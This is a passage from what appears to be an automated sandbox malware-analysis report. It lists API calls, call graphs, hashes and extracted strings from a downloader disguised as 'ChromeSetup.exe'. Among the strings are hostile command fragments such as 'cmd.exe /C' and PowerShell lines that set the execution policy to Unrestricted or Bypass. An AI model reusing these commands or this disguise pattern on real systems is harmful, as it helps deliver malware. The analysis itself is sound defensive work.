_invalid_parameter_noinfo_noreturn 12000->12001 12002 100116e3 12001->12002 12003 10002cb0 _invalid_parameter_noinfo_noreturn 12002->12003 12004 100116f2 12003->12004 12005 10002cb0 _invalid_parameter_noinfo_noreturn 12004->12005 12006 10011701 12005->12006 12007 10002cb0 _invalid_parameter_noinfo_noreturn 12006->12007 12008 10011710 12007->12008 12009 10012620 _invalid_parameter_noinfo_noreturn 12008->12009 12010 1001171f 12009->12010 12011 10012620 _invalid_parameter_noinfo_noreturn 12010->12011 12012 1001172e 12011->12012 12013 10002cb0 _invalid_parameter_noinfo_noreturn 12012->12013 12014 1001173d 12013->12014 12015 10002cb0 _invalid_parameter_noinfo_noreturn 12014->12015 12016 1001174f 12015->12016 12018 10002da0 8 API calls 12017->12018 12019 10005588 12018->12019 12020 10002ad0 9 API calls 12019->12020 12021 100055b6 12020->12021 12022 10002ad0 9 API calls 12021->12022 12023 100055cf 12022->12023 12051 10012730 12023->12051 12026 10002ad0 9 API calls 12027 100055fa 12026->12027 12028 10002ad0 9 API calls 12027->12028 12029 10005613 _Error_objects 12028->12029 12030 1000567a 12029->12030 12055 10012a40 12029->12055 12058 10012a20 12029->12058 12061 10013910 12030->12061 12035 10003bc0 10 API calls 12036 100056b5 12035->12036 12037 10002cb0 _invalid_parameter_noinfo_noreturn 12036->12037 12038 100056d0 12037->12038 12039 10002cb0 _invalid_parameter_noinfo_noreturn 12038->12039 12040 100056dc 12039->12040 12041 10002cb0 _invalid_parameter_noinfo_noreturn 12040->12041 12042 100056eb 12041->12042 12043 10002cb0 _invalid_parameter_noinfo_noreturn 12042->12043 12044 100056fa 12043->12044 12045 10002cb0 _invalid_parameter_noinfo_noreturn 12044->12045 12046 10005706 12045->12046 12047 10002cb0 _invalid_parameter_noinfo_noreturn 12046->12047 12048 10005715 12047->12048 12049 10002cb0 _invalid_parameter_noinfo_noreturn 12048->12049 12050 10005724 12049->12050 12050->11780 12052 10012742 Concurrency::task_continuation_context::task_continuation_context 12051->12052 12053 10013e30 2 API calls 12052->12053 12054 100055e2 12053->12054 12054->12026 12056 10002c20 10 API calls 12055->12056 12057 10012a53 12056->12057 12057->12029 12059 100128b0 Concurrency::task_continuation_context::task_continuation_context 9 API calls 12058->12059 12060 10012a34 12059->12060 12060->12029 12062 10013925 Concurrency::task_continuation_context::task_continuation_context 12061->12062 12064 10013948 12062->12064 12067 10001410 ?_Xlength_error@std@@YAXPBD 12062->12067 12065 100146c0 7 API calls 12064->12065 12066 10005691 12065->12066 12066->12035 12067->12064

                                                                                                  Executed Functions

                                                                                                  Function 008D0032 Relevance: 70.8, APIs: 2, Strings: 38, Instructions: 795memoryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetNativeSystemInfo.KERNEL32(?), ref: 008D04AE
                                                                                                  • VirtualAlloc.KERNEL32(?,?,00003000,00000004), ref: 008D04DE
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1734162605.00000000008D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_8d0000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AllocInfoNativeSystemVirtual
                                                                                                  • String ID: A$A$Cach$F$Fu$G$Li$Lo$P$Rt$S$Syst$Ta$Vi$Via$a$a$a$a$b$b$ctio$ee$fo$iv$mI$o$oc$otec$p$st$t$tNat$tu$tu$ucti$ushI$yA
                                                                                                  • API String ID: 2032221330-2899676511
                                                                                                  • Opcode ID: 82ef88a58992c726dca534e4f3eff6f5ce2a19202078a525a2214f4ed1b422dd
                                                                                                  • Instruction ID: b83132b0c60866f701317c0aa86096a2508a9918ea931c656f89b395ec53190e
                                                                                                  • Opcode Fuzzy Hash: 82ef88a58992c726dca534e4f3eff6f5ce2a19202078a525a2214f4ed1b422dd
                                                                                                  • Instruction Fuzzy Hash: 2B626A315083858FD720CF24C840BABBBE5FF94714F144A2EE9C99B392E774A949CB56
                                                                                                  Function 10002090 Relevance: 42.5, APIs: 19, Strings: 5, Instructions: 504networkfilesleepCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • InternetOpenA.WININET(URLDownloader,00000001,00000000,00000000,00000000), ref: 100020D3
                                                                                                  • InternetOpenUrlA.WININET(?,?,00000000,00000000,80000000,00000000), ref: 100020EF
                                                                                                  • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,1001844C,?,?,10017512,000000FF), ref: 10002101
                                                                                                  • HttpQueryInfoW.WININET(?,20000005,00000000,00000004,00000000), ref: 10002136
                                                                                                  • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 10002153
                                                                                                    • Part of subcall function 10001D60: VariantInit.OLEAUT32(?), ref: 10001D6B
                                                                                                    • Part of subcall function 10001D80: VariantClear.OLEAUT32(10002776), ref: 10001D8B
                                                                                                    • Part of subcall function 10001A20: _com_issue_error.COMSUPP ref: 10001A92
                                                                                                  • InternetReadFile.WININET(?,?,00001000,?), ref: 1000216E
                                                                                                  • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 10002197
                                                                                                  • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 10002230
                                                                                                  • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 10002240
                                                                                                  • InternetCloseHandle.WININET(?), ref: 1000224D
                                                                                                  • InternetCloseHandle.WININET(?), ref: 10002257
                                                                                                  • GetParent.USER32(?), ref: 10002261
                                                                                                  • ShowWindow.USER32(?,00000000,?,000000FF), ref: 10002270
                                                                                                  • WaitForSingleObject.KERNEL32(0000055C,00007530,?,000000FF), ref: 10002282
                                                                                                  • CoInitializeEx.OLE32(00000000,00000000,?,000000FF), ref: 1000228C
                                                                                                  • CoCreateInstance.OLE32(1001837C,00000000,00000001,1001836C,00000000), ref: 100022AE
                                                                                                  • Sleep.KERNEL32(000003E8), ref: 1000291A
                                                                                                    • Part of subcall function 10001E30: VariantInit.OLEAUT32(?), ref: 10001EAA
                                                                                                  • Sleep.KERNEL32(000003E8), ref: 1000287F
                                                                                                    • Part of subcall function 10001FA0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 10001FAD
                                                                                                  • exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 10002928
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1738782885.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1738757132.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1739013263.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1739067862.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1739090953.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_10000000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Internet$Variant$CloseCreateHandleInitMessageOpenSendSleep$ClearFileHttpInfoInitializeInstanceObjectParentQueryReadShowSingleSnapshotToolhelp32WaitWindow_com_issue_errorexitfclosefopenfwrite
                                                                                                  • String ID: .NET Framework Action$.NET Framework Action$.NET Framework Action$ChromeSetup.exe$URLDownloader
                                                                                                  • API String ID: 2588663270-2833095850
                                                                                                  • Opcode ID: c9b4f2acf23c8b8e7e324eeffd37ffd6b563c1d675994be5fdea45c9a92adb6a
                                                                                                  • Instruction ID: 1a265d8126e776f6a60fe0a7d1a5fce7a7262b6fb56b0006430606afee9c3406
                                                                                                  • Opcode Fuzzy Hash: c9b4f2acf23c8b8e7e324eeffd37ffd6b563c1d675994be5fdea45c9a92adb6a
                                                                                                  • Instruction Fuzzy Hash: 89427DB4E012289FDB64CF59C895BDDBBB5BF49300F1082DAE909A7355DB30AA85CF50
                                                                                                  Function 10005760 Relevance: 49.3, APIs: 20, Strings: 6, Instructions: 3822sleepprocesssynchronizationCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 158 10005760-1000b26e call 10017290 call 10002da0 call 10002e20 call 10001cd0 call 10011770 call 10012640 call 10001cd0 call 10011770 call 10012640 call 10005400 * 2 call 10002ec0 * 2 call 10004fe0 call 10002cd0 call 10002cb0 call 10004fe0 call 10002cd0 call 10002cb0 GetTempPathA call 10002da0 call 10001cd0 call 10011770 call 10012640 call 10005400 call 10012620 call 10002e20 call 10005250 call 10001cd0 call 10011770 call 10012640 call 10005400 call 100138d0 call 10002cb0 call 10012620 call 10002b60 call 10005520 call 10002b60 call 10002da0 call 10005300 call 10002cb0 Sleep call 10002b60 call 10002da0 call 10001cd0 call 10011770 call 10012640 call 10005400 call 10002e20 call 10005250 call 10002cb0 call 10012620 call 10002cb0 call 10002b60 call 10002da0 call 10001cd0 call 10011770 call 10012640 call 10005400 call 10002e20 call 10005250 call 10002cd0 call 10002cb0 * 2 call 10012620 call 10002cb0 call 100139a0 call 10013a30 * 11 call 10002cb0 * 11 call 10002b60 call 10005520 call 10002b60 call 10002da0 call 10005300 call 10002cb0 Sleep call 10001cd0 call 10011770 call 10012640 call 10005400 call 10001cd0 call 10011770 call 10012640 call 10005400 call 10013890 call 10002cb0 call 10012620 call 10002cb0 call 10012620 call 10002b60 WinExec Sleep call 10001cd0 call 10011770 call 10012640 call 10005400 call 10012620 call 10002b60 call 10001cd0 call 10011770 call 10012640 call 10005400 call 10003bc0 call 10003b90 call 10002cd0 call 10002cb0 * 3 call 10012620 memset call 10002b60 ShellExecuteExA 411 1000b270-1000b277 158->411 412 1000b29b-1000b39e call 10002cb0 * 12 call 10012620 * 2 call 10002cb0 * 2 158->412 414 1000b296 411->414 415 1000b279-1000b295 WaitForSingleObject CloseHandle 411->415 416 1000b3a3-1000b443 Sleep call 10002b60 call 10002da0 call 10005740 call 10002cb0 call 10002b60 call 10002da0 call 10005740 call 10002cb0 call 10002b60 call 10005520 call 10002b60 call 10005520 412->416 479 1000b54e-1000b561 412->479 414->416 415->414 464 1000b448-1000b548 call 10002cb0 * 12 call 10012620 * 2 call 10002cb0 * 2 416->464 464->479
                                                                                                  APIs
                                                                                                  • _Smanip.LIBCPMTD ref: 10005DF2
                                                                                                  • _Smanip.LIBCPMTD ref: 1000A195
                                                                                                    • Part of subcall function 10005400: HandleT.LIBCPMTD ref: 1000546A
                                                                                                  • GetTempPathA.KERNEL32(00000104,?,?,?,?,?,?,?,?,000000FF), ref: 1000A35B
                                                                                                  • _Smanip.LIBCPMTD ref: 1000A3C6
                                                                                                  • _Smanip.LIBCPMTD ref: 1000A4D7
                                                                                                    • Part of subcall function 10005520: DeleteFileA.KERNEL32(1000A58A,?,1000A58A,00000000,?,?,?,0000005C,?), ref: 10005527
                                                                                                    • Part of subcall function 10005300: ??Bios_base@std@@QBE_NXZ.MSVCP140(?,00000022,00000040,00000001), ref: 1000534A
                                                                                                    • Part of subcall function 10005300: ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBD_J@Z.MSVCP140(1000A5BB,000000FF,?), ref: 10005384
                                                                                                    • Part of subcall function 10005300: SetFileAttributesA.KERNEL32(00000000,00000001), ref: 100053A0
                                                                                                  • Sleep.KERNEL32(000000C8,?,00000000,?,?,?,?,0000005C,?), ref: 1000A5D3
                                                                                                  • _Smanip.LIBCPMTD ref: 1000A630
                                                                                                  • _Smanip.LIBCPMTD ref: 1000A764
                                                                                                  • Sleep.KERNEL32(000000C8,?,00000000), ref: 1000AB7C
                                                                                                  • _Smanip.LIBCPMTD ref: 1000ADA7
                                                                                                  • _Smanip.LIBCPMTD ref: 1000AE64
                                                                                                  • WinExec.KERNEL32(00000000,00000000), ref: 1000AF3E
                                                                                                  • Sleep.KERNEL32(000003E8,?,?,?,00000063,?,00000070,?,?,00000000), ref: 1000AF49
                                                                                                  • _Smanip.LIBCPMTD ref: 1000B046
                                                                                                  • _Smanip.LIBCPMTD ref: 1000B0E2
                                                                                                  • memset.VCRUNTIME140(?,00000000,00000038), ref: 1000B20A
                                                                                                  • ShellExecuteExA.SHELL32(?), ref: 1000B266
                                                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 1000B282
                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 1000B28F
                                                                                                  • Sleep.KERNEL32(000003E8), ref: 1000B3A8
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1738782885.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1738757132.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1739013263.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1739067862.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1739090953.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_10000000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Smanip$Sleep$FileHandle$?write@?$basic_ostream@AttributesBios_base@std@@CloseD@std@@@std@@DeleteExecExecuteObjectPathShellSingleTempU?$char_traits@V12@Waitmemset
                                                                                                  • String ID: .NET Framework Action$/C $\PolicyManagement.xml$cmd.exe /C $powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"$powershell -ExecutionPolicy Bypass -File
                                                                                                  • API String ID: 1867003993-3862442261
                                                                                                  • Opcode ID: b0ee089b01d6b1e17c926042021f85da182826e1f840194c69618660950b3ddc
                                                                                                  • Instruction ID: c3f484f0cadaf97ba32f422996ffd4aa446fbc6566911116cce282fd85213db7
                                                                                                  • Opcode Fuzzy Hash: b0ee089b01d6b1e17c926042021f85da182826e1f840194c69618660950b3ddc
                                                                                                  • Instruction Fuzzy Hash: 2FD36A50D0D6E8C9EB22C2288C587DDBEB55B22749F4441D9819C2A283C7BF1FD9CF66
                                                                                                  Function 1000A2B4 Relevance: 41.2, APIs: 18, Strings: 5, Instructions: 967sleepprocesssynchronizationCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 570 1000a2b4-1000b26e GetTempPathA call 10002da0 call 10001cd0 call 10011770 call 10012640 call 10005400 call 10012620 call 10002e20 call 10005250 call 10001cd0 call 10011770 call 10012640 call 10005400 call 100138d0 call 10002cb0 call 10012620 call 10002b60 call 10005520 call 10002b60 call 10002da0 call 10005300 call 10002cb0 Sleep call 10002b60 call 10002da0 call 10001cd0 call 10011770 call 10012640 call 10005400 call 10002e20 call 10005250 call 10002cb0 call 10012620 call 10002cb0 call 10002b60 call 10002da0 call 10001cd0 call 10011770 call 10012640 call 10005400 call 10002e20 call 10005250 call 10002cd0 call 10002cb0 * 2 call 10012620 call 10002cb0 call 100139a0 call 10013a30 * 11 call 10002cb0 * 11 call 10002b60 call 10005520 call 10002b60 call 10002da0 call 10005300 call 10002cb0 Sleep call 10001cd0 call 10011770 call 10012640 call 10005400 call 10001cd0 call 10011770 call 10012640 call 10005400 call 10013890 call 10002cb0 call 10012620 call 10002cb0 call 10012620 call 10002b60 WinExec Sleep call 10001cd0 call 10011770 call 10012640 call 10005400 call 10012620 call 10002b60 call 10001cd0 call 10011770 call 10012640 call 10005400 call 10003bc0 call 10003b90 call 10002cd0 call 10002cb0 * 3 call 10012620 memset call 10002b60 ShellExecuteExA 785 1000b270-1000b277 570->785 786 1000b29b-1000b39e call 10002cb0 * 12 call 10012620 * 2 call 10002cb0 * 2 570->786 788 1000b296 785->788 789 1000b279-1000b295 WaitForSingleObject CloseHandle 785->789 790 1000b3a3-1000b548 Sleep call 10002b60 call 10002da0 call 10005740 call 10002cb0 call 10002b60 call 10002da0 call 10005740 call 10002cb0 call 10002b60 call 10005520 call 10002b60 call 10005520 call 10002cb0 * 12 call 10012620 * 2 call 10002cb0 * 2 786->790 853 1000b54e-1000b561 786->853 788->790 789->788 790->853
                                                                                                  APIs
                                                                                                  • GetTempPathA.KERNEL32(00000104,?,?,?,?,?,?,?,?,000000FF), ref: 1000A35B
                                                                                                  • _Smanip.LIBCPMTD ref: 1000A3C6
                                                                                                    • Part of subcall function 10005400: HandleT.LIBCPMTD ref: 1000546A
                                                                                                  • _Smanip.LIBCPMTD ref: 1000A4D7
                                                                                                    • Part of subcall function 10005520: DeleteFileA.KERNEL32(1000A58A,?,1000A58A,00000000,?,?,?,0000005C,?), ref: 10005527
                                                                                                    • Part of subcall function 10005300: ??Bios_base@std@@QBE_NXZ.MSVCP140(?,00000022,00000040,00000001), ref: 1000534A
                                                                                                    • Part of subcall function 10005300: ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBD_J@Z.MSVCP140(1000A5BB,000000FF,?), ref: 10005384
                                                                                                    • Part of subcall function 10005300: SetFileAttributesA.KERNEL32(00000000,00000001), ref: 100053A0
                                                                                                  • Sleep.KERNEL32(000000C8,?,00000000,?,?,?,?,0000005C,?), ref: 1000A5D3
                                                                                                  • _Smanip.LIBCPMTD ref: 1000A630
                                                                                                  • _Smanip.LIBCPMTD ref: 1000A764
                                                                                                  • Sleep.KERNEL32(000000C8,?,00000000), ref: 1000AB7C
                                                                                                  • _Smanip.LIBCPMTD ref: 1000ADA7
                                                                                                  • _Smanip.LIBCPMTD ref: 1000AE64
                                                                                                  • WinExec.KERNEL32(00000000,00000000), ref: 1000AF3E
                                                                                                  • Sleep.KERNEL32(000003E8,?,?,?,00000063,?,00000070,?,?,00000000), ref: 1000AF49
                                                                                                  • _Smanip.LIBCPMTD ref: 1000B046
                                                                                                  • _Smanip.LIBCPMTD ref: 1000B0E2
                                                                                                  • memset.VCRUNTIME140(?,00000000,00000038), ref: 1000B20A
                                                                                                  • ShellExecuteExA.SHELL32(?), ref: 1000B266
                                                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 1000B282
                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 1000B28F
                                                                                                  • Sleep.KERNEL32(000003E8), ref: 1000B3A8
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1738782885.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1738757132.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1739013263.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1739067862.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1739090953.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_10000000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Smanip$Sleep$FileHandle$?write@?$basic_ostream@AttributesBios_base@std@@CloseD@std@@@std@@DeleteExecExecuteObjectPathShellSingleTempU?$char_traits@V12@Waitmemset
                                                                                                  • String ID: /C $\PolicyManagement.xml$cmd.exe /C $powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"$powershell -ExecutionPolicy Bypass -File
                                                                                                  • API String ID: 1867003993-2154795836
                                                                                                  • Opcode ID: b95d4323615e4dbc46461cad133ddac9392ad2e1edfb6e9f7f37158bc2c31dc6
                                                                                                  • Instruction ID: 5ee5c772d32b0c25501e7099b99da70bcf1678fc7b94072c772d4481403b0835
                                                                                                  • Opcode Fuzzy Hash: b95d4323615e4dbc46461cad133ddac9392ad2e1edfb6e9f7f37158bc2c31dc6
                                                                                                  • Instruction Fuzzy Hash: 88B24C74C08298DEEB25CB68CC45BDEBBB5AF15304F0441D9E14D67292DBB52B88CF62
                                                                                                  Function 10001660 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 179windowregistrythreadCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • GetModuleHandleA.KERNEL32(00000000), ref: 10001682
                                                                                                    • Part of subcall function 10001430: SHGetKnownFolderPath.SHELL32(10018310,00000000,00000000,00000000), ref: 1000148B
                                                                                                    • Part of subcall function 10001430: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0(?,00000000,00000104), ref: 100014AA
                                                                                                    • Part of subcall function 10001430: CoTaskMemFree.OLE32(00000000,00000000,?), ref: 100014DE
                                                                                                  • CreateThread.KERNEL32(00000000,00000000,10005760,00000000,00000000,00000000), ref: 10001798
                                                                                                  • RegisterClassW.USER32(?), ref: 100017F7
                                                                                                  • GetSystemMetrics.USER32(00000001), ref: 100017FF
                                                                                                  • GetSystemMetrics.USER32(00000000), ref: 10001812
                                                                                                  • CreateWindowExW.USER32(00000000,?,?,00C40000,?,?,00000190,00000078,00000000,00000000,00000000,00000000), ref: 1000185E
                                                                                                  • ShowWindow.USER32(?,00000001,?,?,?,?,?,?,?,10017426), ref: 1000186D
                                                                                                  • KiUserCallbackDispatcher.NTDLL(?,00000000,00000000,00000000), ref: 10001894
                                                                                                  • TranslateMessage.USER32(?), ref: 100018A2
                                                                                                  • DispatchMessageW.USER32(?), ref: 100018AC
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1738782885.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1738757132.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1739013263.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1739067862.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1739090953.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_10000000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CreateMessageMetricsSystemWindow$CallbackClassDispatchDispatcherFolderFreeHandleKnownModulePathRegisterShowTaskThreadTranslateUserwcstombs
                                                                                                  • String ID: ChromeSetup.exe$URLDownloader
                                                                                                  • API String ID: 73900685-4101260699
                                                                                                  • Opcode ID: e2c4abd069d022b3f62bc688cf9d5a6553670ba20d304f4198ffeaec2c1a15ca
                                                                                                  • Instruction ID: 8631f2352c9d4e8355fdf3fc5455be072e9b283b4b7067b2d869b395449685d5
                                                                                                  • Opcode Fuzzy Hash: e2c4abd069d022b3f62bc688cf9d5a6553670ba20d304f4198ffeaec2c1a15ca
                                                                                                  • Instruction Fuzzy Hash: 807110B5D00218EFEB54CFA4CC45FDEBBB4EB48700F108169E619A7295EB74AA44CF51
                                                                                                  Function 100018D0 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 87windowthreadCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • InitCommonControlsEx.COMCTL32(00000008), ref: 10001903
                                                                                                  • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 1000190D
                                                                                                  • CreateWindowExW.USER32(00000000,msctls_progress32,00000000,50800001,00000014,0000001E,00000159,00000014,00000001,00000065,00000000), ref: 10001933
                                                                                                  • SetWindowTheme.UXTHEME(00030420,10018438,10018434), ref: 1000194E
                                                                                                  • SendMessageW.USER32(00030420,00000409,00000000,00D77800), ref: 10001967
                                                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(0000000C), ref: 10001978
                                                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_000019F0,?,00000000,00000000), ref: 100019B9
                                                                                                  • PostQuitMessage.USER32(00000000), ref: 100019C4
                                                                                                  • DefWindowProcW.USER32(00000002,?,?,?), ref: 100019DD
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1738782885.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1738757132.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1739013263.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1739067862.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1739090953.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_10000000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Window$CreateMessage$CommonControlsHandleInitModulePostProcQuitSendThemeThreadmalloc
                                                                                                  • String ID: $msctls_progress32
                                                                                                  • API String ID: 1181878002-3669180086
                                                                                                  • Opcode ID: f1c3b5bd482cc1038fd523d6cd0664b2522f3065c76e0cbb8d44deae0c0665e8
                                                                                                  • Instruction ID: 07dac4f513f804ff03a6516b31f22f63e0bdfab53d31000085bea38267b703f6
                                                                                                  • Opcode Fuzzy Hash: f1c3b5bd482cc1038fd523d6cd0664b2522f3065c76e0cbb8d44deae0c0665e8
                                                                                                  • Instruction Fuzzy Hash: 03310675A40218FFF750CF94CC9AFAA77B4FB48701F208118FA05AA290C770DA00CB65
                                                                                                  Function 10015820 Relevance: 17.9, APIs: 8, Strings: 2, Instructions: 357filesynchronizationCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                    • Part of subcall function 100054B0: SHGetFolderPathA.SHELL32(00000000,10015860,00000000,00000000,?), ref: 100054D1
                                                                                                    • Part of subcall function 10015750: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 10015783
                                                                                                    • Part of subcall function 10015700: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1001571E
                                                                                                  • _Smanip.LIBCPMTD ref: 10015B0A
                                                                                                  • _Smanip.LIBCPMTD ref: 10015BA4
                                                                                                  • memset.VCRUNTIME140(?,00000000,00000038,?,?,?,0000002F,?,00000070,?), ref: 10015C85
                                                                                                  • ShellExecuteExA.SHELL32(0000003C,?,?,?,?,?,?,0000002F,?,00000070,?), ref: 10015CE1
                                                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,?,?,0000002F,?,00000070,?), ref: 10015CFD
                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,0000002F,?,00000070,?), ref: 10015D0A
                                                                                                  • CopyFileA.KERNEL32(00000000,?,00000000), ref: 10015D73
                                                                                                  • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 10015D99
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1738782885.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1738757132.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1739013263.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1739067862.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1739090953.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_10000000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: File$ExecuteModuleNameShellSmanip$CloseCopyFolderHandleObjectPathSingleWaitmemset
                                                                                                  • String ID: %s\%s$open
                                                                                                  • API String ID: 1049494684-538903891
                                                                                                  • Opcode ID: 0874a88fbfece6f8bf1c8d8ced0699038052d698083af6ca92b648841300b0f5
                                                                                                  • Instruction ID: 9eb432f15a048c8dfdefea35090f5a4ff5850cd705bbf9561c51413f96cb23ad
                                                                                                  • Opcode Fuzzy Hash: 0874a88fbfece6f8bf1c8d8ced0699038052d698083af6ca92b648841300b0f5
                                                                                                  • Instruction Fuzzy Hash: 48021374C083D8DEEB11CBA4C859BDDBFB5AF15304F0441D9D1496B282DBBA5B88CB62
                                                                                                  Function 10015DF0 Relevance: 12.0, APIs: 8, Instructions: 41synchronizationthreadCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • CreateMutexA.KERNEL32(00000000,00000000,100185DC), ref: 10015E0A
                                                                                                  • GetLastError.KERNEL32 ref: 10015E13
                                                                                                  • CloseHandle.KERNEL32(?), ref: 10015E24
                                                                                                  • exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 10015E2C
                                                                                                  • GetCurrentThread.KERNEL32 ref: 10015E3C
                                                                                                  • WaitForSingleObject.KERNEL32(00000000), ref: 10015E43
                                                                                                  • CreateThread.KERNEL32(00000000,00000000,1000B570,00000000,00000000,00000000), ref: 10015E58
                                                                                                  • exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 10015E65
                                                                                                  Memory Dump Source
